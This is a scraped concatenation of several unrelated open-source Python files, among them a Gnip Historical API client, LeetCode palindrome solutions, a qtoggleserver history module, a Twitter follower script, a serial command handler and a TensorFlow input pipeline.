            self.expiresAt = datetime.datetime.strptime(DATE_RE.search(expires).group(0), DATEFMT)

    def __repr__(self):
        lines = [
            'QUOTE:',
            ' Est. Cost ............... $ %.2f' % (self.costDollars),
            ' Est. No. of Activities .. {0:,}'.format(self.estimatedActivityCount),
            ' Est. Hours to Complete .. %.1f' % (self.estimatedDurationHours),
            ' Est. # filesize (MB)..... {0:,}'.format(self.estimatedFileSizeMb),
            ' Expires at .............. %s' % (self.expiresAt),
        ]
        return '\n'.join(lines) + '\n'
#
#
#
class Status(object):
    """Job status record parsed from a server response dict.

    This and jobParameters have the same base class?
    When gnipHist is supplied, any embedded results are resolved into a Result.
    """
    def __init__(self, statusDict, gnipHist=None):
        # Error responses (or a missing dict) produce a stub object with only
        # title/status/statusMessage/jobURL populated.
        # NOTE(review): if statusDict is None, the membership test below
        # raises TypeError -- confirm callers never actually pass None.
        if statusDict is None or statusDict["status"] == "error":
            self.status = 'Error retrieving Job status'
            if "reason" in statusDict:
                self.status += ": {}".format(statusDict["reason"])
            self.statusMessage = 'Please verify your connection parameters and network connection'
            self.title = "{} -- {}".format(self.status, self.statusMessage)
            self.jobURL = None
        else:
            #
            self.title = statusDict["title"]
            self.publisher = statusDict["publisher"]
            self.streamType = statusDict["streamType"]
            # SHORT_DATEFMT comes from gnip_historical_job (star import).
            self.fromDate = datetime.datetime.strptime(statusDict["fromDate"], SHORT_DATEFMT)
            self.toDate = datetime.datetime.strptime(statusDict["toDate"], SHORT_DATEFMT)
            # self.jobURL = repairStagingURLs(statusDict["jobURL"])
            self.jobURL = statusDict["jobURL"]
            # Possible job progress
            self.requestedBy = self.set("requestedBy", statusDict)
            self.account = self.set("account", statusDict)
            self.format = self.set("format", statusDict)
            self.status = self.set("status", statusDict)
            self.statusMessage = self.set("statusMessage", statusDict)
            if "percentComplete" in statusDict:
                # NOTE(review): float(None) raises TypeError if the key is
                # present but null -- confirm server behaviour.
                self.percentComplete = float(self.set("percentComplete",statusDict))
            else:
                self.percentComplete = 0.0
            if "requestedAt" in statusDict:
                self.requestedAt = datetime.datetime.strptime(DATE_RE.search(statusDict["requestedAt"]).group(0), DATEFMT)
            else:
                self.requestedAt = None
            if "acceptedAt" in statusDict:
                self.acceptedAt = datetime.datetime.strptime(DATE_RE.search(statusDict["acceptedAt"]).group(0),DATEFMT)
                self.acceptedBy = statusDict["acceptedBy"]
            else:
                self.acceptedAt = None
                self.acceptedBy = None
            if "quote" in statusDict:
                self.quote = Quote(statusDict["quote"])
            else:
                self.quote = None
            # Results require the client object to resolve the data URL.
            if "results" in statusDict and gnipHist is not None:
                self.result = Result(statusDict["results"], gnipHist)
            else:
                self.result = None
    def set(self, f, d, n=False):
        # Safe dict lookup: value if present, else None (or -1 when n=True).
        if f in d:
            return d[f]
        else:
            if n:
                return -1
            else:
                return None
    def __repr__(self):
        # Banner sized to the title, then one line per populated field.
        res = '*'*(8+len(self.title)) + '\n'
        res += '*** %s ***\n'%self.title
        res += '*'*(8+len(self.title)) + '\n\n'
        if self.jobURL is None:
            # Stub/error status: nothing more to show.
            return res
        else:
            res += 'Job URL: %s\n\n'%self.jobURL
        if self.acceptedAt is not None:
            res += 'Job accepted date ........ %s\n'%self.acceptedAt
        res += 'From date ................ %s\n'%self.fromDate
        res += 'To date .................. %s\n'%self.toDate
        res += 'Request date ............. %s\n'%self.requestedAt
        res += 'Status ................... %s\n'%self.status
        res += 'Status message ........... %s\n'%self.statusMessage
        res += 'Percent complete ......... %2.2f\n'%self.percentComplete
        if self.quote is not None:
            res += str(self.quote)
        if self.result is not None:
            res += str(self.result)
        return res
#
#
#
class GnipHistorical(object):
    """Thin client for the Gnip Historical PowerTrack REST API.

    Holds credentials, the account base URL and (optionally) a job-parameters
    object; caches the most recently retrieved Status in self.status.
    """
    def __init__(self, UN, PWD, baseUrl, jParsObj = None):
        self.user_name = UN
        self.password = PWD
        self.baseUrl = baseUrl
        self.jobPars = jParsObj
        self.status = None # status object created when job status is retrieved
    def acceptJob(self, jobURL):
        """Accept a quoted job."""
        return self.xJob(jobURL, {"status":"accept"})
    def rejectJob(self, jobURL):
        """Reject a quoted job."""
        return self.xJob(jobURL, {"status":"reject"})
    def xJob(self, jobURL, payload):
        """Make the server request to accept or reject a job; returns a message string."""
        res = None
        try:
            s = requests.Session()
            s.auth = (self.user_name, self.password)
            s.headers = {'content-type':'application/json'}
            res = s.put(jobURL, data=json.dumps(payload))
        except requests.exceptions.ConnectionError as e:
            sys.stderr.write("Server request failed with message {}".format(e))
        except requests.exceptions.HTTPError as e:
            sys.stderr.write("Server request failed with message {}".format(e))
        if res is not None and res.status_code == 200:
            return "Job {}ed successfully".format(payload["status"])
        elif res is None:
            # BUG FIX: the original dereferenced res.status_code here and
            # raised AttributeError whenever the request itself failed.
            return "Request failed: no response received from server"
        else:
            return "Request failed with response code ({}): {}".format(res.status_code, res.text)
    def createJob(self):
        """POST the stored job parameters to create a new job; returns its Status."""
        res = None
        try:
            s = requests.Session()
            s.auth = (self.user_name, self.password)
            s.headers = {'content-type':'application/json'}
            res = s.post(self.baseUrl + "publishers/twitter/jobs.json", data=str(self.jobPars))
        except requests.exceptions.ConnectionError as e:
            sys.stderr.write("Server request failed with message {}".format(e))
        except requests.exceptions.HTTPError as e:
            sys.stderr.write("Server request failed with message {}".format(e))
        if res is None:
            # BUG FIX: surface connection failures as an error Status instead
            # of crashing on res.json() with AttributeError.
            return Status({"status": "error", "reason": "no response received from server"})
        return Status(res.json())
    def listJobs(self):
        """Generator of jobs from the server. Jobs are generated in order and include every status
        type. The number of items returned depends on the history in the server job log."""
        res = None
        try:
            s = requests.Session()
            s.auth = (self.user_name, self.password)
            res = s.get(self.baseUrl + "publishers/twitter/jobs.json")
        except requests.exceptions.ConnectionError as e:
            sys.stderr.write("Server request failed with message {}".format(e))
        except requests.exceptions.HTTPError as e:
            sys.stderr.write("Server request failed with message {}".format(e))
        if res is not None and "jobs" in res.json():
            for x in res.json()["jobs"]:
                yield Status(x)
        else:
            yield {"status": "Status Error: Server failed to return valid JSON object"}
    def getDataURLDict(self, URL):
        """Return job record data download urls for the specified job. The url proivided should be the
        specific url with job id provided by the system and must be in the current job
        log. That is, the url must represent a valid job that would be retrieved with e.g. listJobs."""
        res = None
        try:
            s = requests.Session()
            s.auth = (self.user_name, self.password)
            res = s.get(URL)
        except requests.exceptions.ConnectionError as e:
            sys.stderr.write("Server request failed with message {}".format(e))
        except requests.exceptions.HTTPError as e:
            sys.stderr.write("Server request failed with message {}".format(e))
        if res is not None:
            return res.json()
        else:
            return {"status": "Status Error: Server failed to return valid JSON object"}
    def getJobStatusDict(self, jobURL = None):
        """Return job record for the specified job. The url proivided should be the
        specific url with job id provided by the system and must be in the current job
        log. That is, the url must represent a valid job that would be retrieved with e.g. listJobs."""
        res = None
        if jobURL is None:
            # Fall back to the URL cached on the last retrieved status.
            try:
                jobURL = self.status.jobURL
            except:
                sys.stderr.write("No job specified.\n")
                return res
        try:
            s = requests.Session()
            s.auth = (self.user_name, self.password)
            res = s.get(jobURL)
        except requests.exceptions.ConnectionError as e:
            sys.stderr.write("Server request failed with message {}".format(e))
        except requests.exceptions.HTTPError as e:
            sys.stderr.write("Server request failed with message {}".format(e))
        if res is not None:
            return res.json()
        else:
            return {"status": "Status Error: Server failed to return valid JSON object"}
    def getJobStatus(self, jobURL = None):
        """Refresh and return the Status object for the given (or cached) job."""
        self.jobStatus(jobURL)
        return self.status
    def jobStatus(self, jobURL = None):
        """Refresh self.status from the server; returns a 'status - message' string."""
        # call jobStatus to get latest from server
        res = self.getJobStatusDict(jobURL)
        self.status = Status(res, self)
        return ' - '.join([self.status.status, self.status.statusMessage])
    def quote(self, jobURL = None):
        """Return the cached Quote for the current job, fetching status if needed."""
        # uses existing record if possible
        if self.status is None:
            self.jobStatus(jobURL)
        # BUG FIX: the original tested '"quote" in self.status', which raises
        # TypeError because Status is not a container; check the attribute.
        if self.status.quote is not None:
            return self.status.quote
        else:
            sys.stderr.write("No quote available.\n")
            return None
    def results(self, jobURL = None):
        """Return the cached Result for the current job, fetching status if needed."""
        # uses existing record if possible
        if self.status is None:
            self.jobStatus(jobURL)
        if self.status.result is not None:
            return self.status.result
        else:
            sys.stderr.write("No results available.\n")
            return None
return None
#
#
#
if __name__ == '__main__':
    # Run some simple demos/tests
    ####################################
    # Working with job parameters
    # Example 1
    from pprint import pprint
    jp = JobParameters("BieberJob1")
    jp.setFromDate("2012-01-01T00:00:00")
    jp.setToDate("2012-01-01T00:01:00")
    tmp = jp.getToDate()
    jp.setToDate("201201010001") # same as above
    print(jp.getToDate(), "=", tmp)
    jp.setUser("DrSkippy27")
    jp.addRule("bieber", "bestRuleEver")
    # job json as string
    print(jp)
    # job json as dict
    pprint(jp.job)
    print("Job duration = ",jp.duration().seconds)
    # NOTE(review): the bare 'print' statements below are Python-2 leftovers;
    # in Python 3 they evaluate the function object without printing anything.
    print
    # Example 2
    # save job description in file
    jp.writeToFile("./bieber_job1.json")
    # Example 3
    # read job description from file
    jp1 = JobParameters("BieberJob2", jobFileName = "./FileMissing.JSON") # this file doesn't exist
    jp1 = JobParameters("BieberJob2", jobFileName = "./bieber_job1.json")
    print(jp1)
    print
    # mess it up
    jp1.setFromDate("2012-01-01T00:02:00")
    try:
        print(jp1) # error
    except ValueError as e:
        print(e)
    print
    # Example 4
    # working with rules
    jp3 = JobParameters("BieberJob2", jobFileName = "./bieber_job1.json")
    jp3.setRules([{"value": "no bieber"}])
    print(jp3)
    jp3.addRule("belieber")
    print(jp3)
    jp3.setRules('[{value":"one"}]') # error this is missing a quote
    jp3.setRules('[{"value":"one"}]')
    print(jp3)
    ####################################
    # Historical 1 - Change if you want to hit the server
    # r = GnipHistorical("user", "password", "https://historical.gnip.com/accounts/<yours>", jp)
    # Creates a job
    # print(r.createJob())
    # NOTE(review): 'r' is never bound because the constructor call above is
    # commented out, so the try below raises NameError (not ValueError).
    # Confirm whether this demo line should also be commented out.
    try:
        r.acceptJob("not a URL") # error
    except ValueError as e:
        print(e)
    # r.rejectJob("not a URL") # error
    # r.jobStatus("not a URL") # error
    # r.jobs() # get a list of jobs from the gnip server
| DrSkippy/Gnip-Python-Historical-Utilities | src/gnip_historical/gnip_historical.py | gnip_historical.py | py | 16,573 | python | en | code | 17 | github-code | 13 |
41229350274 | from cmath import exp
from unittest import result
def check_is_palindrome(idx1: int, idx2: int, s: str) -> bool:
    """Return True when s[idx1:idx2 + 1] reads the same in both directions.

    Both indices are inclusive; intended for idx1 <= idx2.
    """
    window = s[idx1 : idx2 + 1]
    return window == window[::-1]
# Brute force: scan windows from longest to shortest and return the first
# palindrome found -- logically correct but O(n^3); the original "wrong
# answer" note was most likely a time-limit failure on large inputs.
def my_sol(s: str) -> str:
    """Return the longest palindromic substring of s (None when s is empty)."""
    for length in range(len(s), 0, -1):
        for idx in range(len(s) - length + 1):
            if check_is_palindrome(idx, idx + length - 1, s):
                return s[idx : idx + length]
def sol1(s: str) -> str:
    """Longest palindromic substring via centre expansion, O(n^2)."""
    # Trivial cases: short strings and strings that are already palindromes.
    if len(s) < 2 or s == s[::-1]:
        return s

    def grow(lo: int, hi: int) -> str:
        # Widen the window while it remains a palindrome, then return it.
        while lo >= 0 and hi < len(s) and s[lo] == s[hi]:
            lo -= 1
            hi += 1
        return s[lo + 1 : hi]

    best = ""
    for centre in range(len(s) - 1):
        # grow(c, c+1): even-length palindrome; grow(c, c+2): odd-length
        # palindrome centred at c+1.  max(..., key=len) keeps the first
        # longest candidate, matching the original tie-breaking.
        best = max(best, grow(centre, centre + 1), grow(centre, centre + 2), key=len)
    return best
| devpotatopotato/devpotatopotato-LeetCode-Solutions | Python_Algorithm_Interview/Ch6/6.py | 6.py | py | 1,041 | python | en | code | 0 | github-code | 13 |
19968351735 | from __future__ import annotations
import asyncio
import logging
import time
from typing import Iterable, Optional
from qtoggleserver import persist, system
from qtoggleserver.conf import settings
from qtoggleserver.core import events as core_events
from qtoggleserver.core import ports as core_ports
from qtoggleserver.core.typing import GenericJSONDict, PortValue
from qtoggleserver.utils import json as json_utils
PERSIST_COLLECTION = 'value_history'
_CACHE_TIMESTAMP_MIN_AGE = 3600 * 1000 # don't cache samples newer than this number of milliseconds ago
logger = logging.getLogger(__name__)
_history_event_handler: Optional[HistoryEventHandler] = None
_sampling_task: Optional[asyncio.Task] = None
_janitor_task: Optional[asyncio.Task] = None
# Samples cached by port_id and timestamp
_samples_cache: dict[str, dict[int, PortValue]] = {}
# Used to schedule sample removal with remove_samples(..., background=True)
_pending_remove_samples: list[tuple[core_ports.BasePort, Optional[int], Optional[int]]] = []
class HistoryEventHandler(core_events.Handler):
    """Records a history sample whenever a port configured for on-change
    history (history interval == -1) reports a new value."""
    # Flag consumed by the events dispatcher elsewhere; presumably means the
    # handler is scheduled without awaiting its result -- confirm there.
    FIRE_AND_FORGET = True
    async def handle_event(self, event: core_events.Event) -> None:
        """Persist a sample for on-change-history ports on ValueChange events."""
        if not isinstance(event, core_events.ValueChange):
            return  # we're only interested in port value changes
        if not system.date.has_real_date_time():
            return  # don't record history unless we've got real date/time
        port = event.get_port()
        history_interval = await port.get_history_interval()
        if history_interval != -1:
            return  # only consider ports with history interval set to special -1 (on value change)
        now_ms = int(time.time() * 1000)  # current time in milliseconds
        await save_sample(port, now_ms)
        port.set_history_last_timestamp(now_ms)
async def sampling_task() -> None:
    """Background task: once per second, persist a sample for every enabled
    port whose positive history interval has elapsed since its last sample."""
    while True:
        try:
            await asyncio.sleep(1)
            if not system.date.has_real_date_time():
                continue  # don't record history unless we've got real date/time
            now_ms = int(time.time() * 1000)
            for port in core_ports.get_all():
                if not port.is_enabled():
                    continue
                history_last_timestamp = port.get_history_last_timestamp()
                history_interval = await port.get_history_interval()
                if history_interval <= 0:  # disabled or on value change
                    continue
                if now_ms - history_last_timestamp < history_interval * 1000:
                    continue  # sampling interval not yet elapsed for this port
                await save_sample(port, now_ms)
                port.set_history_last_timestamp(now_ms)
                port.save_asap()  # history_last_timestamp must be persisted
        except asyncio.CancelledError:
            # cancellation is the normal shutdown path (see cleanup())
            logger.debug('sampling task cancelled')
            break
        except Exception as e:
            # keep the task alive on unexpected errors; just log them
            logger.error('sampling task error: %s', e, exc_info=True)
async def janitor_task() -> None:
    """Background task: periodically drops samples older than each port's
    retention period and processes removals queued via
    remove_samples(..., background=True)."""
    global _pending_remove_samples
    while True:
        try:
            await asyncio.sleep(settings.core.history_janitor_interval)
            if not system.date.has_real_date_time():
                continue  # timestamps are meaningless without real date/time
            now = int(time.time())
            for port in core_ports.get_all():
                history_retention = await port.get_history_retention()
                if history_retention <= 0:
                    continue  # retention disabled for this port
                # drop everything older than the retention window (ms)
                to_timestamp = (now - history_retention) * 1000
                logger.debug('removing old samples of %s from history', port)
                await remove_samples([port], from_timestamp=0, to_timestamp=to_timestamp)
            # Remove samples that were background-scheduled for removal
            # Group together requests w/o timestamp bounds
            ports = []
            rem_pending_remove_samples = []
            for port, from_timestamp, to_timestamp in _pending_remove_samples:
                if from_timestamp is to_timestamp is None:
                    ports.append(port)
                else:
                    rem_pending_remove_samples.append((port, from_timestamp, to_timestamp))
            if ports:
                # unbounded requests can be served with one grouped removal
                port_ids = [p.get_id() for p in ports]
                logger.debug('removing samples of %s from history (background)', ', '.join(port_ids))
                await remove_samples(ports)
            # bounded requests are processed one by one
            _pending_remove_samples = rem_pending_remove_samples
            while _pending_remove_samples:
                port, from_timestamp, to_timestamp = _pending_remove_samples.pop(0)
                logger.debug('removing samples of %s from history (background)', port)
                await remove_samples([port], from_timestamp=from_timestamp, to_timestamp=to_timestamp)
        except asyncio.CancelledError:
            # cancellation is the normal shutdown path (see cleanup())
            logger.debug('janitor task cancelled')
            break
        except Exception as e:
            # keep the task alive on unexpected errors; just log them
            logger.error('janitor task error: %s', e, exc_info=True)
def is_enabled() -> bool:
    """True when the persistence driver supports history and config enables it."""
    return persist.is_history_supported() and settings.core.history_support
async def get_samples_slice(
    port: core_ports.BasePort,
    from_timestamp: Optional[int] = None,
    to_timestamp: Optional[int] = None,
    limit: Optional[int] = None,
    sort_desc: bool = False
) -> Iterable[GenericJSONDict]:
    """Query stored samples of `port` within [from_timestamp, to_timestamp),
    yielding dicts with `value` and `timestamp` keys.

    Timestamps are in milliseconds; both bounds and `limit` are optional.
    """
    filt = {
        'pid': port.get_id(),
    }
    if from_timestamp is not None:
        filt.setdefault('ts', {})['ge'] = from_timestamp  # ts >= from_timestamp
    if to_timestamp is not None:
        filt.setdefault('ts', {})['lt'] = to_timestamp  # ts < to_timestamp
    sort = 'ts'
    if sort_desc:
        sort = f'-{sort}'  # leading '-' requests descending order
    results = await persist.query(PERSIST_COLLECTION, filt=filt, sort=sort, limit=limit)
    return ({'value': r['val'], 'timestamp': r['ts']} for r in results)
async def get_samples_by_timestamp(
    port: core_ports.BasePort,
    timestamps: list[int]
) -> Iterable[GenericJSONDict]:
    """For each requested timestamp, yield the most recent sample of `port`
    at or before it, or None when no such sample exists.

    Lookups older than _CACHE_TIMESTAMP_MIN_AGE are memoized per port in
    _samples_cache -- presumably because sufficiently old history no longer
    changes, so caching it is safe.
    """
    port_filter = {
        'pid': port.get_id(),
    }
    now_ms = int(time.time() * 1000)
    samples_cache = _samples_cache.setdefault(port.get_id(), {})
    # sentinel distinguishing "not cached" from a cached None record
    INEXISTENT = {}
    query_tasks = []
    for timestamp in timestamps:
        # Look it up in cache
        sample = samples_cache.get(timestamp, INEXISTENT)
        if sample is INEXISTENT:
            filt = dict(port_filter, ts={'le': timestamp})  # ts <= timestamp
            task = persist.query(PERSIST_COLLECTION, filt=filt, sort='-ts', limit=1)
        else:
            # cache hit: wrap the cached record in an already-resolved future
            task = asyncio.Future()
            task.set_result([sample])
        query_tasks.append(task)
    # run all lookups concurrently, preserving request order
    task_results = await asyncio.gather(*query_tasks)
    samples = []
    for i, task_result in enumerate(task_results):
        timestamp = timestamps[i]
        query_results = list(task_result)
        if query_results:
            sample = query_results[0]
            samples.append(sample)
        else:
            samples.append(None)
        # Add sample to cache if it's old enough
        if now_ms - timestamp > _CACHE_TIMESTAMP_MIN_AGE:
            samples_cache[timestamp] = samples[-1]
    return ({'value': r['val'], 'timestamp': r['ts']} if r is not None else None for r in samples)
async def save_sample(port: core_ports.BasePort, timestamp: int) -> None:
    """Persist the port's last read value as a history sample at `timestamp`
    (milliseconds).  Null values are skipped."""
    value = port.get_last_read_value()
    if value is None:
        logger.debug('skipping null sample of %s (timestamp = %s)', port, timestamp)
        return
    logger.debug('saving sample of %s (value = %s, timestamp = %s)', port, json_utils.dumps(value), timestamp)
    # record schema: pid = port id, val = sample value, ts = millisecond timestamp
    record = {
        'pid': port.get_id(),
        'val': value,
        'ts': timestamp
    }
    await persist.insert(PERSIST_COLLECTION, record)
async def remove_samples(
    ports: list[core_ports.BasePort],
    from_timestamp: Optional[int] = None,
    to_timestamp: Optional[int] = None,
    background: bool = False
) -> Optional[int]:
    """Remove samples of `ports` within [from_timestamp, to_timestamp).

    When `background` is True the removal is only queued (performed later by
    the janitor task) and None is returned; otherwise the persistence
    layer's removal result is returned.
    """
    filt = {
        'pid': {'in': [p.get_id() for p in ports]}
    }
    if from_timestamp is not None:
        filt.setdefault('ts', {})['ge'] = from_timestamp  # ts >= from_timestamp
    if to_timestamp is not None:
        filt.setdefault('ts', {})['lt'] = to_timestamp  # ts < to_timestamp
    # Invalidate samples cache for the ports
    for port in ports:
        _samples_cache.pop(port.get_id(), None)
    if background:
        for port in ports:
            _pending_remove_samples.append((port, from_timestamp, to_timestamp))
    else:
        return await persist.remove(PERSIST_COLLECTION, filt)
async def reset() -> None:
    """Drop the entire value-history collection."""
    logger.debug('clearing persisted data')
    await persist.remove(PERSIST_COLLECTION)
async def init() -> None:
    """Register the value-change handler, start the sampling and janitor
    background tasks, and ensure the timestamp index exists."""
    global _history_event_handler
    global _sampling_task
    global _janitor_task
    _history_event_handler = HistoryEventHandler()
    core_events.register_handler(_history_event_handler)
    _sampling_task = asyncio.create_task(sampling_task())
    _janitor_task = asyncio.create_task(janitor_task())
    # index on 'ts' speeds up the range queries used throughout this module
    await persist.ensure_index(PERSIST_COLLECTION, 'ts')
async def cleanup() -> None:
    """Cancel the background tasks and wait for them to finish.

    Both tasks catch CancelledError themselves and exit their loops, so
    awaiting them here returns normally.
    """
    if _sampling_task:
        _sampling_task.cancel()
        await _sampling_task
    if _janitor_task:
        _janitor_task.cancel()
        await _janitor_task
| qtoggle/qtoggleserver | qtoggleserver/core/history.py | history.py | py | 9,068 | python | en | code | 16 | github-code | 13 |
40170789643 | #! /usr/bin/python
# libraries
import tweepy
import sys
# twiiter application details
cKey = 'XXXXXXXXXXXXXXXXXXXXXXXXXX'
cSecret = 'XXXXXXXXXXXXXXXXXXXXXXXXXX'
aToken = 'XXXXXXXXXXXXXXXXXXXXXXXXXX'
aTokenSecret = 'XXXXXXXXXXXXXXXXXXXXXXXXXX'
# authentication
auth = tweepy.OAuthHandler(cKey, cSecret)
auth.set_access_token(aToken, aTokenSecret)
tw = tweepy.API(auth)
u = sys.argv[1]
# saves the following list in a variable
uFriends = tw.friends_ids(u)
# saves the follower list in a variable
uFollowers = tw.followers_ids(u)
# count total following
uFriendsC = tw.get_user(u).friends_count
# count total followers
uFollowersC = tw.get_user(u).followers_count
# list to save verfied twitter followers
vFs = []
# prints the following list of a user
def listFollowing():
    """Print the screen name of every account the user follows."""
    print("Printing users, please wait.../\n")
    for user in uFriends:
        print(tw.get_user(user).screen_name + ', ',end='', flush=True)
# prints the followers list of a user
def listFollowers():
    """Print the screen name of every follower."""
    print("Printing users, please wait.../\n")
    for user in uFollowers:
        print(tw.get_user(user).screen_name + ', ',end='', flush=True)
# prints followers of a user who are following back
def doFollow():
    """Print followed accounts that also follow back (mutuals)."""
    print("Printing users, please wait.../\n")
    for user in uFriends:
        if user in uFollowers:
            print(tw.get_user(user).screen_name + ', ',end='', flush=True)
# count the users who are following back
def doFollowC():
    """Return how many followed accounts follow the user back."""
    return sum(1 for user in uFriends if user in uFollowers)
# prints followers a user who are not following back
def doNotFollow():
    """Print followed accounts that do NOT follow back."""
    print("Printing users, please wait.../\n")
    for user in uFriends:
        if user not in uFollowers:
            print(tw.get_user(user).screen_name + ', ',end='', flush=True)
# count the users who are following back
def noFollowC():
    """Return how many followed accounts do NOT follow the user back."""
    return sum(1 for user in uFriends if user not in uFollowers)
# count the veified user who are following back
def verifiedFollowers():
    """Count mutual followers that are verified accounts.

    Side effect: appends each verified follower's screen name to the global
    vFs list (printed later by liVFs).  The profile is fetched once per
    mutual follower instead of twice, halving the Twitter API calls made by
    the original version.
    """
    vFC = 0
    for user in uFriends:
        if user in uFollowers:
            profile = tw.get_user(user)  # single API call per mutual follower
            if profile.verified == 1:
                # save the verified user in the vFs list
                vFC += 1
                vFs.append(profile.screen_name)
    return vFC
# prints saved list of verified followers
def liVFs():
    """Print the verified-follower names collected by verifiedFollowers()."""
    print("Printing users, please wait.../\n")
    print (','.join(map(str, vFs)))
# calls various type of list functions
def viewList():
    """Interactive menu: ask which list to print and dispatch to it.

    Re-runs itself while the user answers Y to the "see again?" prompt, and
    via wrC() on an invalid choice.
    """
    print(" \nGet list of,\n")
    print(" Following [1] ")
    print(" Followers [2] ")
    print(" Following back [3] ")
    print(" !Following back [4] ")
    print(" Verified followers [5]")
    print(" Exit [6] ")
    print(" \nYour choice: ", end = '', flush=True)
    d = input()
    if d == '1':
        listFollowing()
    elif d == '2':
        listFollowers()
    elif d == '3':
        doFollow()
    elif d == '4':
        doNotFollow()
    elif d == '5':
        liVFs()
    elif d == '6':
        # BUG FIX: the original called `system(exit)` -- `system` is never
        # imported, so option 6 crashed with a NameError.  Exit cleanly.
        sys.exit()
    else:
        wrC()
    print("\nSee the list again? [Y/n]: ", end='', flush=True)
    dA = input()
    while dA == 'Y' or dA == 'y':
        viewList()
        break
# prints wrong choice message
def wrC():
    """Report an invalid menu choice, then show the menu again (mutual
    recursion with viewList)."""
    print("\nIt seems you have chosed a wrong option!")
    viewList()
# basic information print
def printBasic(u):
    """Print the account summary (name, follow counts, verified mutuals)
    for the username `u`.  The verified count triggers one API call per
    mutual follower, hence the warning text below."""
    print(" Name: " + tw.get_user(u).name)
    print(" Username: " + u)
    print(" Following: " + str(uFriendsC))
    print(" Following back: " + str(doFollowC()))
    print(" !Following back: " + str(noFollowC()))
    print(" Followers: " + str(uFollowersC))
    print(" ———————————————————————————————————————————————————————————————")
    print(" Please wait till I check how many celebrities are following you,")
    print(" the more follower you have the more time I take../")
    print(" ———————————————————————————————————————————————————————————————")
    print(" Verified: " + str(verifiedFollowers()))
# main function
def main():
    """Entry point: print the account summary, then the interactive menu."""
    print("\nTwitter Account Information Retreiver\n")
    printBasic(u)
    viewList()
    print("\nMy functions are limited, perhaps that's it for now!")
if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        # let Ctrl-C exit cleanly instead of dumping a traceback
        print('\nWhy cancel btw! Anyways, run again if you want../')
| IamLizu/twair | main.py | main.py | py | 4,819 | python | en | code | 0 | github-code | 13 |
31336251190 | import argparse
import protocol
import sys
from config import setup
from logger import init_logger, get_logger
from serial import Serial
logger = get_logger(__name__)
def parse_cmdline(argv):
    """Parse command-line arguments for the serial watcher."""
    parser = argparse.ArgumentParser()
    parser.add_argument("-c", "--config", required=True, help="Path to config")
    parser.add_argument("-d", "--dev", required=True, help="Path to serial dev")
    parser.add_argument(
        "--params",
        metavar="params",
        nargs="*",
        help="Extra parameters for commands",
    )
    return parser.parse_args(argv)
def main(args):
    """Run the serial watcher: read framed lines from the device and either
    log messages ('M' frames) or execute configured commands ('C' frames).

    The outer loop re-handshakes (protocol.init) after any unexpected error;
    Ctrl-C breaks out entirely.
    """
    config = setup(args.config, args.params)
    logger.info(config)
    logger.info("Watching serial %s", args.dev)
    with Serial(args.dev, config.baud_rate, timeout=config.timeout) as dev:
        while True:
            hello_message = protocol.init(dev)
            logger.info("Received hello: %s", hello_message)
            try:
                while True:
                    magic, payload = protocol.readline(dev)
                    if magic == b"M":
                        logger.info("Recv message %s", payload)
                    elif magic == b"C":
                        # command payload is a decimal index into config.commands
                        cmd = int(payload.decode().strip())
                        logger.info("Recv command %s", cmd)
                        config.commands[cmd].run(log=True)
                    else:
                        raise ValueError(f"main: unexpected magic {magic}, mesg {payload}")
            except KeyboardInterrupt:
                break
            except Exception as e:
                logger.warning(f"Unhandled exception: {e}. Restarting.")
                continue
if __name__ == "__main__":
main(parse_cmdline(sys.argv[1:]))
| bcskda/EvaCockpit | handler/main.py | main.py | py | 1,697 | python | en | code | 0 | github-code | 13 |
29942909305 | #! /usr/local/bin/python3.8
#_*_ coding: utf-8 _*_
#_*_ coding: gbk _*_
#Author: Collin Liew
import requests
import json
URL = "http://127.0.0.1:8008/api-token-auth/"
paras = {
"username":"admin",
"password":"admin",
}
def getcode(link, para):
    """POST credentials to the token endpoint and return the response JSON
    pretty-printed as a string."""
    response = requests.post(link, para)
    payload = response.json()
    return json.dumps(payload, indent=4, sort_keys=True)
dic_str = getcode(URL, paras)
dic_t = json.loads(dic_str)
# NOTE(review): this loop prints the token's second character once per key
# of the response -- looks like debugging leftovers rather than intent.
for K,V in dic_t.items():
    print(dic_t["token"][1])
rest = list(dic_t.values())
print(rest)
GETur = "http://127.0.0.1:8008/personnel/api/employees/4711971733/"  # employee detail endpoint
# request headers: hard-coded token auth obtained above
auth = {
    "Authorization":"Token da328540365716418d22a81947c195a70639e5cd",
    "Content-Type":"application/json",
}
def getUser(GETur, auth):
    """GET the employee record with the given auth headers and return the
    response JSON pretty-printed as a string."""
    response = requests.get(GETur, headers=auth)
    payload = response.json()
    return json.dumps(payload, indent=4)
dic_PIN = getUser(GETur,auth)
dic_e = json.loads(dic_PIN)
# NOTE(review): prints the second character of first_name once per key of
# the response -- likely debugging leftovers.
for Ke,Va in dic_e.items():
    print(dic_e["first_name"][1])
ret = list(dic_e.values())
def Convert(list_name):
    """Recursively print every scalar element of a (possibly nested) list."""
    for item in list_name:
        if isinstance(item, list):
            Convert(item)
        else:
            print(item)
Convert(ret)
| Blossom193/DemoforETP | DemoforETPAPI.py | DemoforETPAPI.py | py | 1,211 | python | en | code | 0 | github-code | 13 |
39671463668 | '''
用法同batch-images.py,只是把next_batch拿出来,解决最后threads不join的问题
'''
import tensorflow as tf
import matplotlib.pyplot as plt
import sys
import data_loader
image_list, label_list = data_loader.get_files('dataset/train/')
tf.flags.DEFINE_integer("image_h", 208, "image height")
tf.flags.DEFINE_integer("image_w", 208, "image width")
tf.flags.DEFINE_boolean("shuffle", False, "The batch data should shuffled or not")
# If num_epochs is not None, every sess.run on the batch tensors decrements
# the remaining-epochs counter (only actual runs count!).
tf.flags.DEFINE_integer("num_epochs", None, "num of epochs")
tf.flags.DEFINE_integer("batch_size", 3, "batch size")
tf.flags.DEFINE_integer("num_threads", 32, "number of threads")
tf.flags.DEFINE_integer("capacity", 256, "capacity")
FLAGS = tf.flags.FLAGS
FLAGS(sys.argv) # parse/enable the flags
# convert the plain Python lists into tensor types TF can consume
image_list = tf.cast(image_list,tf.string)
label_list = tf.cast(label_list,tf.int32)
# build the input queue
input_queue = tf.train.slice_input_producer([image_list, label_list], shuffle=FLAGS.shuffle,num_epochs=FLAGS.num_epochs) # if there are 2 elms in the 1st param,the next sentence uses '[1]' to get that param
# get image's matrix
image_contents = tf.read_file(input_queue[0])
image = tf.image.decode_jpeg(image_contents,channels=3)
# the following 2 ways of resizing both make sense
image = tf.image.resize_image_with_crop_or_pad(image,FLAGS.image_h,FLAGS.image_w)
# get label
label = input_queue[1]
# assemble the batch tensors
